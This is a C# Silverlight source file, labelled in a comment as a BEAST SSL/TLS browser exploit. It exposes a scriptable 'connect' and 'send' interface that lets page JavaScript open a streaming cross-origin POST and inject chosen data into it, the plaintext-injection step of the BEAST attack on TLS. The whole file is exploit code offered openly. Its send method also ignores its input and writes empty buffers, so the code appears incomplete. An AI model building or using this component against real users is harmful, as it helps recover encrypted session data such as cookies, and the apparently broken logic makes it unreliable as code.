1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Animation;
using System.Windows.Shapes;
using System.Windows.Browser;
using System.IO;
using System.Threading;
//BEAST SSL/TLS  SilverLight browser exploit
namespace beast
{
   public partial class MainPage : UserControl
   {
       private Stream requestStream;
       private HttpWebRequest request;

       public MainPage()
       {
           InitializeComponent();
           HtmlPage.RegisterScriptableObject("beast", this);
       }
    
   [ScriptableMember]
       public string connect(string url)
       {
    

           request = (HttpWebRequest)HttpWebRequest.Create(new Uri(url));
           request.AllowWriteStreamBuffering = false;
           request.Method = "POST";
           request.ContentLength = 666666;

           request.ContentType = "application/octet-stream";
           request.BeginGetRequestStream(new
AsyncCallback(SendCallback), request);
           return "eatMySoP";
       }
       private void SendCallback(IAsyncResult asyncResult)
       {
           try
           {
               WebRequest req = asyncResult.AsyncState as WebRequest;

               requestStream = req.EndGetRequestStream(asyncResult);
               byte[] buffer = new Byte[4096];
               System.Threading.Thread thr = new Thread(delegate()
                {

                        requestStream.Write(buffer, 0, 4096);
                        requestStream.Flush();
                });
               thr.Start();

               req.BeginGetResponse(new AsyncCallback(ReadCallback), req);
           }
           catch (Exception) { }

       }
       [ScriptableMember]
       public void send(string data)
       {
           byte[] buffer = new Byte[8192];
    
               requestStream.Write(buffer, 0, 8192);
               requestStream.Flush();
        
           request.BeginGetResponse(new AsyncCallback(ReadCallback), request);


       }
       private void ReadCallback(IAsyncResult asynchronousResult)
       {
       HttpWebRequest req= (HttpWebRequest)asynchronousResult.AsyncState;;
       HttpWebResponse response =(HttpWebResponse)req.EndGetResponse(asynchronousResult);
       }
   }
}